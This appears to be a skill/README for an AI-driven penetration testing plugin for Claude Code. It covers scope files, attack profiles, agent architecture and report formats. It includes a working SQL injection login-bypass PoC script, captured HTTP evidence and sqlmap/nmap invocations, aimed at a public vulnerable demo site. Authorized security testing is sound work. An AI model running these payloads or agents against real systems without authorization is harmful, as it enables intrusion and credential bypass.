---
name: claude-pentest-framework
description: AI-driven penetration testing framework for Claude Code with 15 agents, 6 skill coordinators, and 63 attack categories coordinated through structured engagement workflows
triggers:
- run a penetration test with Claude
- set up offensive security testing with AI
- configure a pentest engagement scope
- launch automated security assessment
- connect Kali Linux server for pentesting
- coordinate AI pentest agents
- define attack profile for security testing
- execute structured vulnerability assessment
---
# claude-pentest Framework
> Skill by [ara.so](https://ara.so) — Security Skills collection.
claude-pentest is a comprehensive penetration testing framework for Claude Code that coordinates 15 specialized agents across 6 skill domains and 63 attack categories. It provides structured, human-in-the-loop, evidence-driven security assessments with automatic PoC generation, HTTP evidence capture, and Playwright screenshots.
## Core Concepts
**Agent Coordination Framework**: Unlike traditional scanners, claude-pentest orchestrates specialized executor agents through a strict 4-phase workflow (reconnaissance → planning → approval → execution), followed by escalation inside the engagement's time-budget loop.
**Human-in-the-Loop**: Every exploitation attempt requires explicit operator approval. Claude cannot proceed to active exploitation without confirmation.
**Evidence-First**: All findings include working PoCs (`poc.py`), captured output (`poc_output.txt`), HTTP evidence, and screenshots. No theoretical findings.
**Structured Outputs**: Machine-readable JSON + markdown analysis written to `outputs/{engagement}/`.
## Installation
### Add Marketplace Repository
```bash
# Inside Claude Code
/plugin marketplace add Stickman230/claude-pentest
```
### Install Plugin
```bash
# Inside Claude Code
/plugin install pentest@claude-pentest
```
The plugin installs to `.claude/` in your project directory. All agents, skills, and slash commands become available immediately.
### Optional: Kali Server (MKS)
For server-side testing (nmap, sqlmap, gobuster, Metasploit), deploy [MCP-Kali-Server](https://github.com/Wh0am123/MCP-Kali-Server) on a Kali Linux host:
```bash
# On Kali Linux
git clone https://github.com/Wh0am123/MCP-Kali-Server
cd MCP-Kali-Server
# Follow MCP-Kali-Server setup instructions
# In Claude Code
/pentest:pentest-kali
# Enter server URL: http://192.168.1.10:5000
```
## Key Commands
### Launch Full Engagement
```bash
/pentest:pentest
```
**Flow**:
1. Isolate session to pentest plugin (recommended)
2. Configure scope (target, engagement name, out-of-scope, time budget, auth, thoroughness)
3. Select attack profile (Full / Web app / API & cloud / Custom)
4. Configure Kali server integration (optional)
5. Review engagement summary
6. Execute: pre-flight → recon → planning → approval → executor deployment → time-budget loop → report
**Session Isolation**: When enabled, Claude constrains itself to pentest plugin agents only, preventing interference from other plugins.
### Define Scope
```bash
/pentest:pentest-scope
```
Configure or update engagement scope without launching. Writes `.pentest-scope.json`:
```json
{
  "target": "https://demo.testfire.net",
  "engagement_name": "altoro-mutual-pentest",
  "out_of_scope": "*.testfire.net/admin, production databases",
  "time_budget": "2 hours",
  "auth": "username: jsmith, password: demo1234",
  "thoroughness": "Medium",
  "output_formats": ["json", "markdown", "csv"],
  "status": "pending"
}
```
**Thoroughness Levels**:
- **Light**: Quick scan, common vulnerabilities only
- **Medium**: Standard pentest, broad coverage
- **Deep**: Extended testing, edge cases
- **Full**: Comprehensive, maximum time investment
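A scope file can be sanity-checked before launching an engagement. The following is a minimal sketch, not part of the plugin: the field names and thoroughness levels come from the example above, while the choice of which fields count as required and the helper names `validate_scope` and `load_scope` are assumptions made for illustration.

```python
import json

# Field names and thoroughness levels are taken from the example above;
# which fields are mandatory is an assumption made for this sketch.
REQUIRED_FIELDS = ("target", "engagement_name", "time_budget", "thoroughness")
THOROUGHNESS_LEVELS = ("Light", "Medium", "Deep", "Full")


def validate_scope(scope: dict) -> list[str]:
    """Return a list of human-readable problems; an empty list means none found."""
    problems = []
    for field in REQUIRED_FIELDS:
        if not scope.get(field):
            problems.append(f"missing or empty field: {field}")
    level = scope.get("thoroughness")
    if level and level not in THOROUGHNESS_LEVELS:
        problems.append(f"unknown thoroughness level: {level}")
    return problems


def load_scope(path: str = ".pentest-scope.json") -> dict:
    """Read the scope file from disk."""
    with open(path, encoding="utf-8") as handle:
        return json.load(handle)
```

Calling `validate_scope(load_scope())` from the project root returns an empty list when the file passes these checks.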
### Define Attack Profile
```bash
/pentest:pentest-attacks
```
Select which attack categories to cover. Writes `.pentest-attacks.json`:
```json
{
  "mode": "web_application",
  "selected_categories": [
    "injection",
    "client_side",
    "authentication",
    "api_security",
    "business_logic"
  ],
  "skill_coordinators": [
    "injection-coordinator",
    "client-side-coordinator",
    "auth-coordinator"
  ],
  "executors": [
    "sql-injection-agent",
    "xss-agent",
    "auth-bypass-agent"
  ],
  "status": "pending"
}
```
**Attack Profiles**:
- **Full suite**: All 63 categories (12 domains)
- **Web application**: Injection, client-side, server-side, authentication, API, business logic
- **API & cloud**: API security, cloud containers, IP infrastructure, CVE testing, domain recon
- **Custom**: Multi-select from all categories
### Connect Kali Server
```bash
/pentest:pentest-kali
```
Configures integration with a remote MCP-Kali-Server (MKS). Writes `.pentest-mks.json`:
```json
{
  "server_url": "http://192.168.1.10:5000",
  "status": "active",
  "tools_available": {
    "nmap": true,
    "gobuster": true,
    "dirb": true,
    "nikto": true,
    "sqlmap": true,
    "hydra": true,
    "john": true,
    "metasploit": true
  },
  "verified_at": "2026-06-08T14:30:00Z"
}
```
**Tool Endpoints** (when MKS active):
```bash
# nmap scan via MKS
curl -X POST http://192.168.1.10:5000/nmap \
-H "Content-Type: application/json" \
-d '{"target": "192.168.1.20", "options": "-sV -sC"}'
# sqlmap via MKS
curl -X POST http://192.168.1.10:5000/sqlmap \
-H "Content-Type: application/json" \
-d '{"url": "http://target.com/api?id=1", "options": "--risk=2 --level=2"}'
```
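The same calls can be made from a script. This is a rough sketch using only the Python standard library; it assumes the endpoint paths and JSON payload shapes shown in the curl examples, and because the response format is not documented here it returns the raw body. The function names `build_mks_request` and `run_mks_tool` and the 300-second default timeout are hypothetical.

```python
import json
import urllib.request


def build_mks_request(server_url: str, tool: str, payload: dict) -> urllib.request.Request:
    """Build (but do not send) a JSON POST request for one MKS tool endpoint."""
    url = f"{server_url.rstrip('/')}/{tool}"
    body = json.dumps(payload).encode("utf-8")
    return urllib.request.Request(
        url,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def run_mks_tool(server_url: str, tool: str, payload: dict, timeout: float = 300.0) -> str:
    """Send the request and return the raw response body as text."""
    request = build_mks_request(server_url, tool, payload)
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return response.read().decode("utf-8", errors="replace")
```

For example, `run_mks_tool("http://192.168.1.10:5000", "nmap", {"target": "192.168.1.20", "options": "-sV -sC"})` mirrors the first curl command. Separating request construction from sending makes the payload easy to inspect before anything touches the network.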
### Exit Engagement
```bash
/pentest:pentest-exit
```
**Flow**:
1. Read findings from `outputs/{engagement}/findings/`
2. Flush unsaved notes to disk
3. Output severity-bucketed summary (Critical/High/Medium/Low/Info)
4. Reset `.pentest-scope.json` and `.pentest-attacks.json` to `status: pending`
5. Lift session isolation
6. Prompt to run `/clear`
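The severity-bucketed summary in step 3 can be pictured as a simple count over the finding records. The sketch below is illustrative only: it assumes each finding is a dict with a `severity` key as in the finding schema, and it treats a missing severity as `Info`, which is a choice made for this example rather than documented behavior.

```python
from collections import Counter

# Severity order follows the buckets named in step 3.
SEVERITY_ORDER = ("Critical", "High", "Medium", "Low", "Info")


def bucket_by_severity(findings: list[dict]) -> dict[str, int]:
    """Count findings per severity, keeping every bucket even when it is empty."""
    counts = Counter(finding.get("severity", "Info") for finding in findings)
    return {severity: counts.get(severity, 0) for severity in SEVERITY_ORDER}


def format_summary(findings: list[dict]) -> str:
    """Render the counts as a single summary line."""
    buckets = bucket_by_severity(findings)
    return " | ".join(f"{name}: {count}" for name, count in buckets.items())
```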
## Session State Files
Three JSON files at the project root persist configuration:
| File | Purpose | Written By |
|------|---------|-----------|
| `.pentest-scope.json` | Target, timing, thoroughness | `/pentest:pentest-scope`, `/pentest:pentest` |
| `.pentest-attacks.json` | Attack categories, skill mapping | `/pentest:pentest-attacks`, `/pentest:pentest` |
| `.pentest-mks.json` | Kali server URL, tool availability | `/pentest:pentest-kali` |
## Agent Architecture
### 15 Executor Agents
Each follows a 4-phase workflow:
1. **Reconnaissance**: Passive information gathering
2. **Planning**: Attack vector identification
3. **Approval**: Human-in-the-loop confirmation
4. **Execution**: Active exploitation with PoC generation
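The approval gate can be modeled as a small state machine in which the step from approval to execution is refused unless the operator has confirmed. This is a conceptual sketch, not the plugin's implementation; the `Phase` enum, the `ApprovalRequired` exception, and `next_phase` are hypothetical names.

```python
from enum import Enum


class Phase(Enum):
    RECONNAISSANCE = 1
    PLANNING = 2
    APPROVAL = 3
    EXECUTION = 4


class ApprovalRequired(Exception):
    """Raised when execution is requested without operator approval."""


def next_phase(current: Phase, operator_approved: bool = False) -> Phase:
    """Advance one phase; leaving APPROVAL requires explicit approval."""
    if current is Phase.EXECUTION:
        raise ValueError("EXECUTION is the final phase")
    if current is Phase.APPROVAL and not operator_approved:
        raise ApprovalRequired("operator must approve before execution")
    return Phase(current.value + 1)
```

Defaulting `operator_approved` to `False` means a caller that forgets to pass it is blocked rather than waved through.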
**Specialized Agents** (8 of the 15 are listed here):
- `sql-injection-agent`: SQL injection testing (error-based, blind, time-based)
- `xss-agent`: XSS testing (reflected, stored, DOM-based)
- `xxe-agent`: XML External Entity exploitation
- `ssrf-agent`: Server-Side Request Forgery
- `auth-bypass-agent`: Authentication mechanism testing
- `api-security-agent`: REST/GraphQL endpoint testing
- `cloud-security-agent`: Cloud misconfiguration detection
- `cve-agent`: Known vulnerability exploitation
### 6 Skill Coordinators
Coordinate related executors:
- `injection-coordinator`: SQL, NoSQL, LDAP, command injection
- `client-side-coordinator`: XSS, CSRF, clickjacking, CORS
- `server-side-coordinator`: XXE, SSRF, file upload, deserialization
- `auth-coordinator`: Broken auth, session management, crypto
- `api-coordinator`: API security, GraphQL, WebSocket
- `infra-coordinator`: Network, cloud, CVE, domain recon
## Output Structure
```
outputs/
└── {engagement_name}/
    ├── findings/
    │   ├── finding_001_sql_injection.json
    │   ├── finding_001_poc.py
    │   ├── finding_001_poc_output.txt
    │   ├── finding_001_screenshot.png
    │   └── finding_001_http_evidence.txt
    ├── processed/
    │   ├── findings/
    │   └── analysis.json
    ├── pentest-report.json
    └── report.md
```
### Finding Schema
```json
{
  "finding_id": "001",
  "title": "SQL Injection in Login Form",
  "severity": "Critical",
  "cvss_score": 9.8,
  "attack_category": "injection",
  "agent": "sql-injection-agent",
  "target_url": "https://demo.testfire.net/login.jsp",
  "vulnerable_parameter": "uid",
  "attack_vector": "' OR '1'='1' --",
  "impact": "Full database access, authentication bypass",
  "poc_file": "finding_001_poc.py",
  "poc_output_file": "finding_001_poc_output.txt",
  "screenshot_file": "finding_001_screenshot.png",
  "http_evidence_file": "finding_001_http_evidence.txt",
  "remediation": "Use parameterized queries, input validation",
  "references": ["CWE-89", "OWASP A03:2021"],
  "verified_at": "2026-06-08T14:45:00Z"
}
```
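Because every finding is expected to carry its evidence, a reviewer may want to confirm that the files a finding names are actually on disk. A minimal sketch, assuming the four `*_file` keys from the schema above and that the files sit in the same `findings/` directory; `missing_evidence` is a hypothetical helper.

```python
from pathlib import Path

# Keys that point at evidence files, taken from the schema above.
EVIDENCE_KEYS = ("poc_file", "poc_output_file", "screenshot_file", "http_evidence_file")


def missing_evidence(finding: dict, findings_dir: Path) -> list[str]:
    """Return the evidence keys whose file is absent or not named at all."""
    missing = []
    for key in EVIDENCE_KEYS:
        name = finding.get(key)
        if not name or not (findings_dir / name).is_file():
            missing.append(key)
    return missing
```

An empty return value means all four evidence files exist for that finding.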
## Common Patterns
### Quick Web App Pentest
```bash
# Define scope
/pentest:pentest-scope
# Enter:
# - Target: https://demo.testfire.net
# - Engagement name: altoro-quick
# - Out-of-scope: None
# - Time budget: 1 hour
# - Auth: None
# - Thoroughness: Medium
# - Formats: json, markdown
# Use web app profile (skip attack selection)
/pentest:pentest
# Select: Use Web Application profile when prompted
```
### API Pentest with Kali Server
```bash
# Connect Kali first
/pentest:pentest-kali
# Enter: http://192.168.1.10:5000
# Define scope
/pentest:pentest-scope
# Target: https://api.example.com/v1
# Thoroughness: Deep
# Select API profile
/pentest:pentest-attacks
# Mode: API & cloud profile
# Launch
/pentest:pentest
```
### Custom Attack Surface
```bash
# Define specific categories
/pentest:pentest-attacks
# Mode: Custom
# Select: SQL injection, SSRF, XXE, authentication bypass
/pentest:pentest
```
### Reuse Saved Configuration
```bash
# Scope and attacks already defined in previous session
/pentest:pentest
# Responds: "Found existing scope (.pentest-scope.json)"
# Select: Reuse existing scope
# Responds: "Found existing attack profile (.pentest-attacks.json)"
# Select: Use saved profile
```
## Time Budget and Escalation
The engagement operates within a **time budget** (quota) defined in scope. The orchestrator:
1. Allocates budget across recon, executor deployment, and escalation phases
2. Runs a **time-budget loop** for escalation after initial findings
3. Deploys Metasploit via MKS for post-exploitation **only if** a CVE or RCE is confirmed
4. Never runs speculative exploitation
**Example Time Budget Allocation** (2 hour total):
- Pre-flight: 5 minutes
- Recon: 20 minutes
- Planning: 10 minutes
- Executor deployment: 60 minutes (parallel)
- Time-budget loop (escalation): 20 minutes
- Report generation: 5 minutes
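The example split adds up to the full 120 minutes (5 + 20 + 10 + 60 + 20 + 5). To get a feel for other budgets, the same proportions can be scaled. Whether the orchestrator scales proportionally is not stated, so treat the sketch below as an assumption; the phase keys and `allocate_budget` are hypothetical.

```python
# Minutes per phase from the 2-hour example above (sums to 120).
EXAMPLE_ALLOCATION = {
    "pre_flight": 5,
    "recon": 20,
    "planning": 10,
    "executor_deployment": 60,
    "escalation_loop": 20,
    "report": 5,
}


def allocate_budget(total_minutes: int) -> dict[str, int]:
    """Scale the example split to another budget, in whole minutes."""
    base_total = sum(EXAMPLE_ALLOCATION.values())
    scaled = {
        phase: total_minutes * minutes // base_total
        for phase, minutes in EXAMPLE_ALLOCATION.items()
    }
    # Integer division can leave a few minutes unassigned; give them to the
    # executor phase so the parts always add up to the total.
    scaled["executor_deployment"] += total_minutes - sum(scaled.values())
    return scaled
```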
## Configuration Examples
### Authenticated Testing
```json
{
  "target": "https://app.example.com",
  "auth": "Bearer token: $AUTH_TOKEN (stored in env), cookie: session_id=$SESSION_ID",
  "thoroughness": "Deep"
}
```
Reference environment variables instead of hardcoding:
```python
# In PoC scripts
import os
AUTH_TOKEN = os.environ.get("AUTH_TOKEN")
SESSION_ID = os.environ.get("SESSION_ID")
headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Cookie": f"session_id={SESSION_ID}",
}
```
### Multi-Target Scope
```json
{
  "target": "https://app.example.com, https://api.example.com, 192.168.1.0/24",
  "out_of_scope": "192.168.1.1 (gateway), *.example.com/admin",
  "time_budget": "4 hours"
}
```
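Since `target` and `out_of_scope` are comma-separated strings that mix URLs, CIDR ranges, and annotated IPs, it can help to check a single address against them before pointing a tool at it. The sketch below covers only the IP and CIDR entries and only exact-match IP exclusions; how the framework itself interprets these strings is not documented here, and `split_entries` and `ip_in_scope` are hypothetical helpers.

```python
import ipaddress


def split_entries(value: str) -> list[str]:
    """Split a comma-separated scope string and drop '(...)' annotations."""
    entries = []
    for raw in value.split(","):
        entry = raw.split("(")[0].strip()
        if entry:
            entries.append(entry)
    return entries


def ip_in_scope(ip: str, target: str, out_of_scope: str) -> bool:
    """True if ip falls inside a target network and is not excluded."""
    address = ipaddress.ip_address(ip)
    if ip in split_entries(out_of_scope):
        return False
    for entry in split_entries(target):
        try:
            network = ipaddress.ip_network(entry, strict=False)
        except ValueError:
            continue  # not an IP or CIDR entry (for example a URL)
        if address in network:
            return True
    return False
```

With the scope above, `192.168.1.20` is in scope, while the gateway `192.168.1.1` and anything outside `192.168.1.0/24` are not.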
### API-Specific Configuration
```json
{
  "target": "https://api.example.com/v1",
  "auth": "API key: $API_KEY (header: X-API-Key)",
  "selected_categories": [
    "api_security",
    "injection",
    "authentication",
    "business_logic"
  ]
}
```
## Evidence Files
### PoC Script Example
`finding_001_poc.py`:
```python
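#!/usr/bin/env python3
"""PoC for finding 001: SQL injection authentication bypass in the login form."""
import requests

TARGET_URL = "https://demo.testfire.net/login.jsp"
PAYLOAD = "' OR '1'='1' --"


def exploit():
    # Inject the payload into the vulnerable `uid` parameter.
    data = {
        "uid": PAYLOAD,
        "passw": "anything",
    }
    # A timeout keeps the PoC from hanging if the target stops responding.
    response = requests.post(TARGET_URL, data=data, timeout=30)

    # Treat a 200 response containing the welcome banner as a successful bypass.
    if "Welcome" in response.text and response.status_code == 200:
        print("[+] SQL Injection successful")
        print(f"[+] Authentication bypassed with payload: {PAYLOAD}")
        return True
    print("[-] Exploitation failed")
    return False


if __name__ == "__main__":
    exploit()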
```
### HTTP Evidence Format
`finding_001_http_evidence.txt`:
```
=== REQUEST ===
POST /login.jsp HTTP/1.1
Host: demo.testfire.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
uid=%27+OR+%271%27%3D%271%27+--&passw=anything
=== RESPONSE ===
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: AltoroAccounts=...
<!DOCTYPE html>
<html>
<body>
<h1>Welcome, Admin</h1>
...
```
## Troubleshooting
### Engagement Won't Start
**Symptom**: `/pentest:pentest` fails at pre-flight check.
**Solution**: Verify target is reachable:
```bash
curl -I https://target.example.com
```
Check `.pentest-scope.json` for valid target format.
### Kali Server Connection Failed
**Symptom**: MKS tools unavailable, falling back to local bash.
**Solution**: Test MKS connectivity:
```bash
curl http://192.168.1.10:5000/health
```
Verify firewall rules allow connection. Re-run `/pentest:pentest-kali`.
### Missing Findings
**Symptom**: Engagement completes but `outputs/{name}/findings/` is empty.
**Solution**: Check thoroughness level (Light may produce fewer findings). Review time budget allocation. Examine `outputs/{name}/processed/analysis.json` for agent logs.
### PoC Scripts Fail
**Symptom**: `poc.py` returns errors when executed manually.
**Solution**: Install dependencies:
```bash
pip install requests playwright
python -m playwright install
```
Verify environment variables are set:
```bash
export AUTH_TOKEN="your_token"
export SESSION_ID="your_session"
```
### Agent Timeout
**Symptom**: Executor agents time out during deployment.
**Solution**: Increase time budget in scope. Reduce thoroughness level. Disable MKS if network latency is high.
### Session Isolation Not Lifted
**Symptom**: After `/pentest:pentest-exit`, other plugins still unavailable.
**Solution**: Run `/clear` to fully reset context:
```bash
/clear
```
## Attack Coverage
**12 Attack Domains**:
1. **Injection**: SQL, NoSQL, LDAP, OS command, SSTI, log injection
2. **Client-Side**: XSS, CSRF, clickjacking, CORS, DOM clobbering
3. **Server-Side**: XXE, SSRF, file upload, deserialization, path traversal
4. **Authentication**: Broken auth, session management, weak crypto
5. **API Security**: REST, GraphQL, WebSocket, API key exposure
6. **Business Logic**: Workflow bypass, race conditions, price manipulation
7. **Access Control**: IDOR, privilege escalation, missing function-level access control
8. **Configuration**: Security misconfiguration, default credentials, verbose errors
9. **Cloud & Containers**: S3 buckets, Docker, Kubernetes, cloud metadata
10. **IP Infrastructure**: Network scanning, service enumeration, SSL/TLS
11. **CVE Testing**: Known vulnerabilities, version detection, patch validation
12. **Domain Recon**: DNS enumeration, subdomain discovery, certificate transparency
**63 Sub-Categories** mapped to specific executor agents and skill coordinators.
## Legal and Ethical Use
**ALWAYS obtain written permission before testing any system you do not own.**
claude-pentest is designed for:
- Authorized penetration testing engagements
- Bug bounty programs (within scope)
- Security research in controlled environments
- Red team exercises with proper authorization
**Unauthorized use is illegal and unethical.**
## Integration with Claude Code
The framework is designed to work within Claude Code's agent harness:
- **One level of subagent nesting**: `/pentest:pentest` orchestrates from main session
- **Slash command discovery**: Commands auto-register with Claude Code
- **Session isolation**: Prevents plugin interference during active engagements
- **Context window management**: `/clear` recommended between engagements
When active, claude-pentest coordinates all testing activities through structured workflows, ensuring evidence capture, human approval gates, and organized output for every finding.